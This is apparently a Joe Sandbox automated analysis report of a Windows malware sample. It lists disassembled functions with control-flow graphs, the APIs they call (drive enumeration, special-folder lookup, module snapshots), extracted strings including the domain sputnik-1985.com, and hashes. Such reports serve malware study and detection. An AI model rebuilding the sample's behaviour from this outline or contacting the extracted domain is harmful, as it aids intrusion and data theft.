                                                                                                                                                                                                              control_flow_graph 297 420b40-420b88 call 43fcf0 300 420b8e-420bee call 4148f0 call 43b130 297->300 301 42143c-42144c 297->301 306 420bf0-420bf3 300->306 307 420bf5-420c3a 306->307 308 420c3c-420c40 306->308 307->306 309 420c42-420c4d 308->309 310 420c54-420c6d 309->310 311 420c4f 309->311 313 420c74-420c7f 310->313 314 420c6f 310->314 312 420d0c-420d0f 311->312 315 420d13-420d18 312->315 316 420d11 312->316 317 420cfb-420d00 313->317 318 420c81-420cf1 call 43cce0 313->318 314->317 319 421340-42137e call 43b160 315->319 320 420d1e-420d2e 315->320 316->315 322 420d02 317->322 323 420d04-420d07 317->323 326 420cf6 318->326 331 421380-421383 319->331 324 420d30-420d50 320->324 322->312 323->309 327 420f76 324->327 328 420d56-420d7a 324->328 326->317 332 420f78-420f7b 327->332 330 420d7e-420d81 328->330 333 420d83-420dcf 330->333 334 420dd1-420def call 421450 330->334 335 421385-4213ca 331->335 336 4213cc-4213d2 331->336 337 420f83-420f99 call 43b130 332->337 338 420f7d-420f81 332->338 333->330 334->327 352 420df5-420e20 334->352 335->331 341 4213d4-4213da 336->341 349 420f9b-420faf 337->349 350 420f9d-420fa8 337->350 342 420fb1-420fb3 338->342 347 4213de-4213f0 341->347 348 4213dc 341->348 344 42131a-421320 342->344 345 420fb9-420fe1 342->345 355 421322-42132a 344->355 356 42132c-421330 344->356 351 420fe5-420fe8 345->351 353 4213f2 347->353 354 4213f4-4213fa 347->354 348->301 349->342 358 421334-421336 350->358 359 4210de-421119 351->359 360 420fee-4210d9 351->360 361 420e24-420e27 352->361 362 421423-421426 353->362 354->362 363 4213fc-421421 call 43cce0 354->363 364 421332 355->364 356->364 358->324 365 42133c-42133e 358->365 368 42111b-42111e 359->368 360->351 369 420ea2-420ebe call 421450 361->369 370 420e29-420ea0 361->370 366 421438-42143a 362->366 367 421428-421436 362->367 363->362 364->358 365->319 366->301 367->341 374 421120-421165 368->374 375 421167-42116b 368->375 379 420ec0 369->379 380 420ec5-420edc 369->380 370->361 374->368 377 42116d-421178 375->377 381 42117a 377->381 382 42117f-42119a 377->382 379->332 385 420ee0-420f74 call 4080d0 call 414560 call 4080e0 380->385 386 420ede 380->386 387 42124c-421256 381->387 383 4211a1-4211ac 382->383 384 42119c 382->384 388 421239-421240 383->388 389 4211b2-42122f call 43cce0 383->389 384->388 385->332 386->385 391 42125a-421279 387->391 392 421258 387->392 395 421242 388->395 396 421244-421247 388->396 398 421234 389->398 397 42127b-42127e 391->397 392->391 395->387 396->377 400 421280-4212ab 397->400 401 4212ad-4212b3 397->401 398->388 400->397 403 4212b5-4212b9 401->403 404 4212eb-4212ee 401->404 407 4212bb-4212c2 403->407 405 421303-421309 404->405 406 4212f0-421301 call 43b160 404->406 412 42130b-42130e 405->412 406->412 408 4212d2-4212db 407->408 409 4212c4-4212d0 407->409 413 4212df-4212e5 408->413 414 4212dd 408->414 409->407 412->344 417 421310-421318 412->417 418 4212e7-4212e9 413->418 414->418 417->358 418->404
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: !@$,$@$C$F$H$I$L$N$O$jW}U$jW}U$jW}U$jW}U$jW}U$jW}U
                                                                                                                                                                                                              • API String ID: 0-2791824542
                                                                                                                                                                                                              • Opcode ID: dceffeb474940c31a35251e24658468f7501d0f388ff1f300dc0d0addb33ba0f
                                                                                                                                                                                                              • Instruction ID: fff8086a162989c9b59c9fe3eb582520f5d4666dc6dfea75adcd7363b3c4d079
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dceffeb474940c31a35251e24658468f7501d0f388ff1f300dc0d0addb33ba0f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8832E67260C7A08BD324CE38D88036FFBE1AB95314F598A2EE5E5873D1D67D8845874B
                                                                                                                                                                                                              Function 00422BF0 Relevance: 12.8, APIs: 3, Strings: 4, Instructions: 534COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 420 422bf0-422c47 421 422c50-422c7b 420->421 421->421 422 422c7d-422cbf RtlExpandEnvironmentStrings 421->422 423 422cc0-422cfb 422->423 423->423 424 422cfd-422d08 423->424 425 422d63-422d6c call 4080e0 424->425 426 422e86-422e8e 424->426 427 423085-423129 424->427 428 42306a 424->428 429 422d0f-422d14 424->429 430 422d6f-422d7b 424->430 431 422d30-422d36 call 4080d0 424->431 432 422e70 424->432 433 422e76-422e7d 424->433 434 422d3b-422d54 RtlExpandEnvironmentStrings 424->434 435 422d5b 424->435 436 423058-423062 424->436 437 422d7c-422d84 424->437 425->430 444 422e90-422e95 426->444 445 422e97 426->445 441 423130-423175 427->441 442 422d16-422d1b 429->442 443 422d1d 429->443 431->434 432->433 433->426 434->425 434->426 434->427 434->428 434->430 434->432 434->433 434->435 434->436 434->437 435->425 436->428 439 422d86-422d8b 437->439 440 422d8d 437->440 448 422d94-422dd4 call 4080d0 439->448 440->448 441->441 449 423177-423183 call 420b40 441->449 450 422d20-422d26 442->450 443->450 451 422e9e-422f43 call 4080d0 444->451 445->451 459 422de0-422df4 448->459 457 423188-42318b 449->457 450->431 460 422f50-422fcf 451->460 463 423193-4231ab 457->463 459->459 462 422df6-422e02 459->462 460->460 461 422fd5-422fe1 460->461 464 422fe3-422fe8 461->464 465 423001-42300e 461->465 466 422e21-422e2e 462->466 467 422e04-422e09 462->467 468 4231b0-423206 463->468 469 422ff0-422fff 464->469 470 423010-423014 465->470 471 423031-423051 GetLogicalDrives call 43fe90 465->471 473 422e30-422e34 466->473 474 422e51-422e5c call 43fe90 466->474 472 422e10-422e1f 467->472 468->468 475 423208-42328f 468->475 469->465 469->469 476 423020-42302f 470->476 471->425 471->428 471->430 471->436 471->463 484 423070-423076 call 4080e0 471->484 485 4232e5 471->485 486 4232eb-4232f1 call 4080e0 471->486 487 42307f 471->487 472->466 472->472 478 422e40-422e4f 473->478 482 422e61-422e69 474->482 480 423290-4232b8 475->480 476->471 476->476 478->474 478->478 480->480 483 4232ba-4232dd call 420640 480->483 482->426 482->427 482->428 482->432 482->433 482->436 482->463 482->484 483->485 484->487 485->486 487->427
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,31B1BF0D,0000000E,00000000,00000000,31B1BEA3), ref: 00422CAF
                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,31B1BEBB), ref: 00422D49
                                                                                                                                                                                                              • GetLogicalDrives.KERNEL32 ref: 00423036
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EnvironmentExpandStrings$DrivesLogical
                                                                                                                                                                                                              • String ID: -*$;-B$G$z
                                                                                                                                                                                                              • API String ID: 1624009813-1819769908
                                                                                                                                                                                                              • Opcode ID: d124cf9099b7a29feb56647592603f6d51bfefdcb8caa7444de7da1b30390289
                                                                                                                                                                                                              • Instruction ID: 699f8274632e480e57769050a871d479fc9d4677c65a78bea885afb816feaa92
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d124cf9099b7a29feb56647592603f6d51bfefdcb8caa7444de7da1b30390289
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 31020EB52083409FD314CF69E99126BBBE1FBC6304F44892DE5958B352E7B88906CB97
                                                                                                                                                                                                              Function 00408710 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 299threadCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 582 408710-408721 call 43c600 585 408727-40872e call 434990 582->585 586 408a9d-408a9f ExitProcess 582->586 589 408734-408767 GetCurrentProcessId GetCurrentThreadId 585->589 590 408a86-408a8d 585->590 591 408771-408843 SHGetSpecialFolderPathW 589->591 592 408769-40876f 589->592 593 408a98 call 43cc50 590->593 594 408a8f-408a95 call 4080e0 590->594 595 408850-40887e 591->595 592->591 593->586 594->593 595->595 598 408880-4088af call 43b130 595->598 602 4088b0-4088cc 598->602 603 4088e6-4088fd GetForegroundWindow 602->603 604 4088ce-4088e4 602->604 605 408903-408a43 603->605 606 408a47-408a7a call 409ca0 603->606 604->602 605->606 606->590 609 408a7c call 40c8d0 606->609 611 408a81 call 40b6b0 609->611 611->590
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00408734
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0040873E
                                                                                                                                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408822
                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 004088F5
                                                                                                                                                                                                                • Part of subcall function 0040B6B0: FreeLibrary.KERNEL32(00408A86), ref: 0040B6B6
                                                                                                                                                                                                                • Part of subcall function 0040B6B0: FreeLibrary.KERNEL32 ref: 0040B6D7
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00408A9F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                              • String ID: iGr
                                                                                                                                                                                                              • API String ID: 3676751680-3172554082
                                                                                                                                                                                                              • Opcode ID: b345672c4834dbb95b68c884c5a00b9a366ba58a5d09aa25e27f7d07c8f7e81c
                                                                                                                                                                                                              • Instruction ID: de36bf932efdb972923ea4c6355cfe05421ed9c09d9add80e63c4a458175fe6b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b345672c4834dbb95b68c884c5a00b9a366ba58a5d09aa25e27f7d07c8f7e81c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 61916B73F447104BC308AE69CD8635AF6C79BC4604F1EC53EA998EB791EA7C8C054785
                                                                                                                                                                                                              Function 0040D693 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 291COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 746 40d693-40d6b6 call 4097c0 CoUninitialize 749 40d6c0-40d6d2 746->749 749->749 750 40d6d4-40d6e5 749->750 751 40d6f0-40d722 750->751 751->751 752 40d724-40d766 751->752 753 40d770-40d799 752->753 753->753 754 40d79b-40d7a3 753->754 755 40d7a5-40d7af 754->755 756 40d7bb-40d7c3 754->756 757 40d7b0-40d7b9 755->757 758 40d7c5-40d7c6 756->758 759 40d7db-40d7e6 756->759 757->756 757->757 762 40d7d0-40d7d9 758->762 760 40d7e8-40d7e9 759->760 761 40d7fb-40d803 759->761 763 40d7f0-40d7f9 760->763 764 40d805-40d809 761->764 765 40d81d 761->765 762->759 762->762 763->761 763->763 766 40d810-40d819 764->766 767 40d820-40d82b 765->767 766->766 768 40d81b 766->768 769 40d83b-40d847 767->769 770 40d82d-40d82f 767->770 768->767 772 40d861-40d922 769->772 773 40d849-40d84b 769->773 771 40d830-40d839 770->771 771->769 771->771 774 40d930-40d962 772->774 775 40d850-40d85d 773->775 774->774 776 40d964-40d97f 774->776 775->775 777 40d85f 775->777 778 40d980-40d992 776->778 777->772 778->778 779 40d994-40d9a9 call 40b6e0 778->779 781 40d9ae-40d9c8 779->781
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Uninitialize
                                                                                                                                                                                                              • String ID: 45*$[<X2$sputnik-1985.com$zr
                                                                                                                                                                                                              • API String ID: 3861434553-549244510
                                                                                                                                                                                                              • Opcode ID: d9306b201c53d49242ecc6fb01d4bd3f81ffcaf4673812bcca7d4250df4ad3db
                                                                                                                                                                                                              • Instruction ID: 306f87100bc4aa896c738fc5f575ce4acc531b808f38179184bca6ff511edaca
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d9306b201c53d49242ecc6fb01d4bd3f81ffcaf4673812bcca7d4250df4ad3db
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C9114B5504B829FD325CF7AC590612BFE2BF973007188699C0D61BB92C379B81ACBD5
                                                                                                                                                                                                              Function 0040AF30 Relevance: 5.5, Strings: 4, Instructions: 533COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 786 40af30-40afc6 787 40afd0-40afd9 786->787 787->787 788 40afdb-40afee 787->788 790 40aff5-40aff7 788->790 791 40b267-40b26e 788->791 792 40b277 788->792 793 40affc-40b212 788->793 794 40b403-40b40a 790->794 791->792 797 40b280-40b2a2 792->797 795 40b220-40b249 793->795 795->795 796 40b24b-40b256 795->796 798 40b259-40b260 796->798 813 40b2f5 797->813 817 40b3e0 797->817 818 40b301 797->818 819 40b2a9-40b2ad 797->819 820 40b3ba-40b3d1 call 43e770 797->820 798->791 798->792 798->797 800 40b340-40b34f 798->800 801 40b542-40b54d 798->801 802 40b505-40b524 798->802 803 40b4a7-40b4b5 798->803 804 40b309-40b315 798->804 805 40b2e9-40b2ee 798->805 806 40b3aa-40b3b3 798->806 807 40b40b-40b412 798->807 808 40b42b-40b454 798->808 809 40b52b-40b53b 798->809 810 40b2ce-40b2d3 call 43cc70 798->810 811 40b5d0-40b665 call 407fb0 798->811 812 40b552-40b5c7 call 407fb0 798->812 798->813 814 40b379-40b383 798->814 815 40b419-40b424 798->815 816 40b2fb 798->816 836 40b350-40b36e 800->836 802->797 802->801 802->805 802->806 802->809 802->810 802->813 823 40b4e0-40b4fd call 43e770 803->823 824 40b6a1-40b6aa 803->824 825 40b3a1-40b3a5 803->825 826 40b681-40b683 803->826 827 40b4c2-40b4df call 43e770 803->827 828 40b38a-40b39f call 43e770 803->828 830 40b3f0-40b3f6 803->830 832 40b4bc 803->832 833 40b3fe-40b400 803->833 835 40b320-40b33e 804->835 805->813 805->817 805->818 805->819 805->820 805->823 805->824 805->825 805->826 805->827 805->828 829 40b68b 805->829 805->830 831 40b693 805->831 805->832 805->833 806->817 806->818 806->820 806->823 806->824 806->825 806->826 806->827 806->828 806->829 806->830 806->831 806->832 806->833 807->797 807->800 807->801 807->802 807->803 807->804 807->805 807->806 807->808 807->809 807->810 807->813 807->814 807->815 807->816 834 40b460-40b47f 808->834 809->797 809->801 809->805 809->806 809->810 809->813 841 40b2d8-40b2e2 810->841 848 40b66b-40b678 811->848 812->811 814->825 814->826 814->828 814->830 814->833 815->797 815->800 815->801 815->802 815->803 815->804 815->805 815->806 815->808 815->809 815->810 815->813 815->816 817->830 818->804 840 40b2b5-40b2c7 819->840 820->817 823->802 824->848 825->848 826->829 827->823 828->825 829->831 830->833 853 40b69b 831->853 833->794 834->834 843 40b481-40b4a0 834->843 835->800 835->835 836->836 845 40b370 836->845 840->797 840->805 840->810 840->813 841->797 841->805 843->797 843->801 843->802 843->803 843->805 843->806 843->809 843->810 843->813 845->814 848->826 853->824
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: CI$D|$P-Hp0xHp$57
                                                                                                                                                                                                              • API String ID: 0-596176976
                                                                                                                                                                                                              • Opcode ID: 24b4c8e607211bd7989446cd1802cc6cb5e641a0b2f8f70cacb991d755ce5a12
                                                                                                                                                                                                              • Instruction ID: 5efbdb5857c2b19ead38b752fe917dd5e517de98fc6789af245636b68d972842
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 24b4c8e607211bd7989446cd1802cc6cb5e641a0b2f8f70cacb991d755ce5a12
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4512ADB6600B01DFD3248F25D891757BBF2FB86314F158A2DD5AA8B7A0DB74A805CF84
                                                                                                                                                                                                              Function 004375F0 Relevance: 4.1, Strings: 3, Instructions: 354COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: jW}U$jW}U$jW}U
                                                                                                                                                                                                              • API String ID: 0-3254358678
                                                                                                                                                                                                              • Opcode ID: f0c88c59089368c22277e3f630874fb5ecbc8d13c4c59e7274c07c995bc35c9a
                                                                                                                                                                                                              • Instruction ID: 1bc7465fbc2acd12f1db27058802fb2540a04be9c422988ecf1b99415a044ea2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f0c88c59089368c22277e3f630874fb5ecbc8d13c4c59e7274c07c995bc35c9a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1DC16A7360C7518FC3249A7C888125BFBD26BDA334F2E5B2ED4E4973D1D6788801878A
                                                                                                                                                                                                              Function 004198CA Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 261COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                              • API String ID: 0-4108050209
                                                                                                                                                                                                              • Opcode ID: 900ec00274fd2904e8a9ee1d06cf83dbd6b482a52b60e155d335a3ff565db05c
                                                                                                                                                                                                              • Instruction ID: d3ba87c4c0d25c63924969f520cf7600d13d9f730c10bad0605ab6a274689941
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 900ec00274fd2904e8a9ee1d06cf83dbd6b482a52b60e155d335a3ff565db05c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D981F7B15083419FC714DF28C8617ABB7E1AF95314F148A2DE4D987391E738DD85CB86
                                                                                                                                                                                                              Function 008DB1B6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008DB1DE
                                                                                                                                                                                                              • Module32First.KERNEL32(00000000,00000224), ref: 008DB1FE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532069127.00000000008DA000.00000040.00000020.00020000.00000000.sdmp, Offset: 008DA000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8da000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3833638111-0
                                                                                                                                                                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                              • Instruction ID: c0c9eb25405f648589d6ca1bd18dedfcfd2e645e5ae852f31b332c92c7a77a3c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F1F06232200714AFDB203AB9989DA6F77E8FF49725F11062AE642D15C0DB70EC458661
                                                                                                                                                                                                              Function 0040D253 Relevance: 2.8, Strings: 2, Instructions: 301COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: C144BB41BBB5F67BBC510B35BBB55F9A$U
                                                                                                                                                                                                              • API String ID: 0-2395377406
                                                                                                                                                                                                              • Opcode ID: 2fa5f9404b8a7954eb32794240adff6e43cb7f3525d5000434579816ac635eaa
                                                                                                                                                                                                              • Instruction ID: d8c2089efcb1f37b43743ed410cd4439feebe70fca87b7e035fb11c7b8385a2a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2fa5f9404b8a7954eb32794240adff6e43cb7f3525d5000434579816ac635eaa
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B291AD79A007414FD3188F3EC891A77B7F2AF9A314F08C57CD486AB396E738A8068755
                                                                                                                                                                                                              Function 0043CCE0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LdrInitializeThunk.NTDLL(0043FCC8,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043CD0E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                              • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                              Function 0043FE90 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                              • API String ID: 2994545307-2766056989
                                                                                                                                                                                                              • Opcode ID: ad475ad411dc5c27689e9980f983b357cb64d85cbfc03358769ef42d6c784ffe
                                                                                                                                                                                                              • Instruction ID: 29b3e18ee5d25421501a93b01dd78fde5a4e6b8cf47dbcda58b9297fcab6b5c2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ad475ad411dc5c27689e9980f983b357cb64d85cbfc03358769ef42d6c784ffe
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D411672A042008BD718CF24D845767B7E2FFC9318F19952EE9955B395E73898088BC6
                                                                                                                                                                                                              Function 0043ED40 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                              • API String ID: 2994545307-2766056989
                                                                                                                                                                                                              • Opcode ID: 821a0e61adfd4cb5765e353bfed2e7a05a83ac5ef0abec0f22db6b346402ea50
                                                                                                                                                                                                              • Instruction ID: 8aa9e213a8c3e3fec8de1b665da31c2ae2a167dfcd0641dbba6ce0cb5a9d0b0b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 821a0e61adfd4cb5765e353bfed2e7a05a83ac5ef0abec0f22db6b346402ea50
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4131E0721083049FC728DF58D8C166BB7F5FF99354F14983DE69987290D3359908CB9A
                                                                                                                                                                                                              Function 00425B20 Relevance: .5, Instructions: 458COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: ce4aa68ec3c31be2608dce2fdd214eebacb69b17789d581c71fd56360dacc5f7
                                                                                                                                                                                                              • Instruction ID: 17ebef0ab422fc6671b6e5576a72cdb626bdf21e9c3bebf7e34878b90bd2cb3b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce4aa68ec3c31be2608dce2fdd214eebacb69b17789d581c71fd56360dacc5f7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45D1AA32B147204BD718CF249C4167BB7A2EFC6314F9AC53EE8859B385E638DD068799
